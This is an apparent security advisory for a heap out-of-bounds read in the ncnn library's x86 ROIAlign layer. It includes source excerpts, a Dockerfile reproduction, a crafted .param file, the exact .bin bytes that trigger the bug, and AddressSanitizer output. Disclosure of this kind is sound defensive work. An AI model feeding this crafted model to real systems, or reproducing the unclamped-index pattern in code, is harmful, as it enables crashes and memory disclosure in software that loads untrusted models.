ROIAlign Heap Out-Of-Bounds Read
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/roialign_x86.cpp:304 in ROIAlign_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted model whose ROI coordinate tensor points outside the feature map makes the x86 ROIAlign layer dereference an unclamped interpolation index, reading well past the feature-map allocation and terminating ncnnoptimize. The attacker supplies a .param plus a .bin holding four floats; ncnnoptimize loads them and executes the graph in ModelWriter::shape_inference(), where the ROI values are materialized by MemoryData::forward and passed straight into ROIAlign_x86::forward. The offset read is a linear function of the attacker's ROI width, so its magnitude is attacker-chosen.
Detail
The ROI box [start_w, start_h, end_w, end_h] is read from the second bottom blob with no validation against the feature map. roi_width is derived from those raw values, and bin_size_w = roi_width / pooled_width inherits the same unbounded scale. In the version-0 precompute, the bin start coordinates are clamped to [0, width], but the sample coordinate x is then produced by adding an unclamped bin_size_w term to the clamped start — and of the four resulting corner indices only x1/y1 are bounds-corrected. x0/y0 are stored as-is:
// src/layer/x86/roialign_x86.cpp:160
for (int bx = 0; bx < bin_grid_w; bx++)
{
float x = wstart + (bx + 0.5f) * bin_size_w / (float)bin_grid_w;
int x0 = (int)x;
int x1 = x0 + 1;
int y0 = (int)y;
int y1 = y0 + 1;
float a0 = x1 - x;
float a1 = x - x0;
float b0 = y1 - y;
float b1 = y - y0;
if (x1 >= width)
{
x1 = width - 1;
a0 = 1.f;
a1 = 0.f;
}
if (y1 >= height)
{
y1 = height - 1;
b0 = 1.f;
b1 = 0.f;
}
// save weights and indices
PreCalc<T> pc;
pc.pos1 = y0 * width + x0;
// src/layer/x86/roialign_x86.cpp:302
PreCalc<float>& pc = pre_calc[pre_calc_index++];
// bilinear interpolate at (x,y)
sum += pc.w1 * ptr[pc.pos1] + pc.w2 * ptr[pc.pos2] + pc.w3 * ptr[pc.pos3] + pc.w4 * ptr[pc.pos4];
With the PoC's Input data 0 1 data 0=4 1=1 2=1 the feature map is 4x1x1, and the MemoryData blob supplies the ROI [4.0, 0.0, 100.0, 0.0]. ROIAlign pool 2 1 data roi out 0=1 1=1 2=1.000000 3=1 4=0 5=0 sets pooled_width = pooled_height = 1, spatial_scale = 1, sampling_ratio = 1, aligned = 0, version = 0. So roi_width = 100 - 4 = 96 and bin_size_w = 96 / 1 = 96, while wstart is clamped to min(max(4, 0), 4) = 4.
For the single sample, x = 4 + 0.5f * 96 / 1 = 52. x0 becomes 52 and x1 53; only x1 is folded back to width - 1 = 3. Because y1 >= height also fires, b0 = 1.f and a0 = 1.f, so pc.w1 = 1.f and the term pc.w1 * ptr[pc.pos1] with pos1 = 0 * 4 + 52 is fully live. Line 304 therefore reads ptr[52] — 208 bytes into a feature map whose entire backing allocation is 84 bytes — which is the out-of-bounds read ASan reports just below the neighbouring ROI clone.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-roialign-heap-out-of-bounds-read && cd ncnn-poc-roialign-heap-out-of-bounds-read
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
3 3
Input data 0 1 data 0=4 1=1 2=1
MemoryData roi 0 1 roi 0=4
ROIAlign pool 2 1 data roi out 0=1 1=1 2=1.0 3=1
EOF
printf '\x00\x00\x80\x40\x00\x00\x00\x00\x00\x00\xc8\x42\x00\x00\x00\x00' > poc.bin
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e0000001d0 at pc 0x557ba3cac092 bp 0x7ffd11cb08a0 sp 0x7ffd11cb0890
READ of size 4 at 0x50e0000001d0 thread T0
#0 0x557ba3cac091 in ncnn::ROIAlign_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/roialign_x86_avx512.cpp:304
#1 0x557b9e2c570b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#2 0x557b9e2adb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x557b9e30d9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x557b9e19f3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x557b9e21ceee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x713776c661c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x713776c6628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x557b9e19c624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e0000001d0 is located 48 bytes before 84-byte region [0x50e000000200,0x50e000000254)
allocated by thread T0 here:
#0 0x7137772dff1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x557b9e23168e in fastMalloc /ncnn/src/allocator.h:62
#2 0x557b9e23168e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x557b9e26f621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
#4 0x557b9e255c14 in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:79
#5 0x557ba19a150e in ncnn::MemoryData::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/layer/memorydata.cpp:57
#6 0x557b9e2c570b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#7 0x557b9e2adb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#8 0x557b9e30d9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#9 0x557b9e19f3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#10 0x557b9e21ceee in main /ncnn/tools/ncnnoptimize.cpp:2844
#11 0x713776c661c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x713776c6628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#13 0x557b9e19c624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/roialign_x86_avx512.cpp:304 in ncnn::ROIAlign_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst